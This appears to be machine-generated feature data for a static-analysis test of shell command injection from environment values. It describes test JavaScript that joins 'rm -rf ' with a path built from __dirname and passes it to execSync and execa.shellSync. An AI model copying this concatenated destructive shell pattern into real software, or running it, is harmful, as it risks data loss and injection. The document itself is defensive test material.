autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:14:8:53 | 'rm -rf ... "temp") | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:14:8:53 | 'rm -rf ... "temp") | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:14:8:53 | 'rm -rf ... "temp") | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:14:8:53 | 'rm -rf ... "temp") | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:14:8:53 | 'rm -rf ... "temp") | receiverName | execa | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:26:8:29 | path | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:26:8:29 | path | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:26:8:29 | path | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:26:8:29 | path | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:26:8:29 | path | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:26:8:34 | path.join | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:26:8:34 | path.join | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:26:8:34 | path.join | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:26:8:34 | path.join | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:26:8:34 | path.join | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:26:8:53 | exceptional return of path.jo ... "temp") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:26:8:53 | exceptional return of path.jo ... "temp") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:26:8:53 | exceptional return of path.jo ... "temp") | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:26:8:53 | exceptional return of path.jo ... "temp") | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:26:8:53 | exceptional return of path.jo ... "temp") | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:26:8:53 | path.jo ... "temp") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:26:8:53 | path.jo ... "temp") | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:26:8:53 | path.jo ... "temp") | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:26:8:53 | path.jo ... "temp") | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:26:8:53 | path.jo ... "temp") | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:26:8:53 | path.jo ... "temp") | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:31:8:34 | join | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:31:8:34 | join | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:31:8:34 | join | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:31:8:34 | join | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:31:8:34 | join | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:36:8:44 | __dirname | CalleeFlexibleAccessPath | path.join | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:36:8:44 | __dirname | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:36:8:44 | __dirname | calleeImports | path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:36:8:44 | __dirname | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:36:8:44 | __dirname | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:36:8:44 | __dirname | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:36:8:44 | __dirname | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:36:8:44 | __dirname | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:36:8:44 | __dirname | receiverName | path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:47:8:52 | "temp" | CalleeFlexibleAccessPath | path.join | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:47:8:52 | "temp" | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:47:8:52 | "temp" | calleeImports | path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:47:8:52 | "temp" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:47:8:52 | "temp" | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:47:8:52 | "temp" | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:47:8:52 | "temp" | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:47:8:52 | "temp" | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:8:47:8:52 | "temp" | receiverName | path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:2:9:6 | execa | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:2:9:6 | execa | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:2:9:6 | execa | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:2:9:6 | execa | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:2:9:6 | execa | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:2:9:16 | execa.shellSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:2:9:16 | execa.shellSync | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:2:9:16 | execa.shellSync | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:2:9:16 | execa.shellSync | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:2:9:16 | execa.shellSync | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:2:9:58 | exceptional return of execa.s ... temp")) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:2:9:58 | exceptional return of execa.s ... temp")) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:2:9:58 | exceptional return of execa.s ... temp")) | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:2:9:58 | exceptional return of execa.s ... temp")) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:2:9:58 | exceptional return of execa.s ... temp")) | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:2:9:58 | execa.s ... temp")) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:2:9:58 | execa.s ... temp")) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:2:9:58 | execa.s ... temp")) | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:2:9:58 | execa.s ... temp")) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:2:9:58 | execa.s ... temp")) | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:8:9:16 | shellSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:8:9:16 | shellSync | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:8:9:16 | shellSync | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:8:9:16 | shellSync | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:8:9:16 | shellSync | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:18:9:26 | 'rm -rf ' | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:18:9:26 | 'rm -rf ' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:18:9:26 | 'rm -rf ' | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:18:9:26 | 'rm -rf ' | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:18:9:26 | 'rm -rf ' | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:18:9:26 | 'rm -rf ' | stringConcatenatedWith | -endpoint- path.join() | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:18:9:57 | 'rm -rf ... "temp") | CalleeFlexibleAccessPath | execa.shellSync | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:18:9:57 | 'rm -rf ... "temp") | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:18:9:57 | 'rm -rf ... "temp") | calleeImports | execa | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:18:9:57 | 'rm -rf ... "temp") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:18:9:57 | 'rm -rf ... "temp") | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:18:9:57 | 'rm -rf ... "temp") | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:18:9:57 | 'rm -rf ... "temp") | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:18:9:57 | 'rm -rf ... "temp") | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:18:9:57 | 'rm -rf ... "temp") | receiverName | execa | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:30:9:33 | path | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:30:9:33 | path | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:30:9:33 | path | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:30:9:33 | path | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:30:9:33 | path | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:30:9:38 | path.join | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:30:9:38 | path.join | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:30:9:38 | path.join | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:30:9:38 | path.join | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:30:9:38 | path.join | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:30:9:57 | exceptional return of path.jo ... "temp") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:30:9:57 | exceptional return of path.jo ... "temp") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:30:9:57 | exceptional return of path.jo ... "temp") | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:30:9:57 | exceptional return of path.jo ... "temp") | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:30:9:57 | exceptional return of path.jo ... "temp") | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:30:9:57 | path.jo ... "temp") | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:30:9:57 | path.jo ... "temp") | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:30:9:57 | path.jo ... "temp") | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:30:9:57 | path.jo ... "temp") | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:30:9:57 | path.jo ... "temp") | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:30:9:57 | path.jo ... "temp") | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:35:9:38 | join | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:35:9:38 | join | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:35:9:38 | join | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:35:9:38 | join | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:35:9:38 | join | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:40:9:48 | __dirname | CalleeFlexibleAccessPath | path.join | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:40:9:48 | __dirname | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:40:9:48 | __dirname | calleeImports | path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:40:9:48 | __dirname | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:40:9:48 | __dirname | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:40:9:48 | __dirname | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:40:9:48 | __dirname | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:40:9:48 | __dirname | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:40:9:48 | __dirname | receiverName | path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:51:9:56 | "temp" | CalleeFlexibleAccessPath | path.join | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:51:9:56 | "temp" | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:51:9:56 | "temp" | calleeImports | path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:51:9:56 | "temp" | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:51:9:56 | "temp" | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:51:9:56 | "temp" | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:51:9:56 | "temp" | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:51:9:56 | "temp" | fileImports | child_process execa path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:9:51:9:56 | "temp" | receiverName | path | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:8:11:11 | safe | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:8:11:11 | safe | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:8:11:11 | safe | enclosingFunctionBody | cp execFileSync rm -rf path join __dirname temp cp execSync rm -rf path join __dirname temp execa shell rm -rf path join __dirname temp execa shellSync rm -rf path join __dirname temp safe " path join __dirname temp " execa shellSync rm -rf safe | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:8:11:11 | safe | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/ShellCommandInjectionFromEnvironment/tst_shell-command-injection-from-environment.js:11:8:11:11 | safe | fileImports | child_process execa path | +| 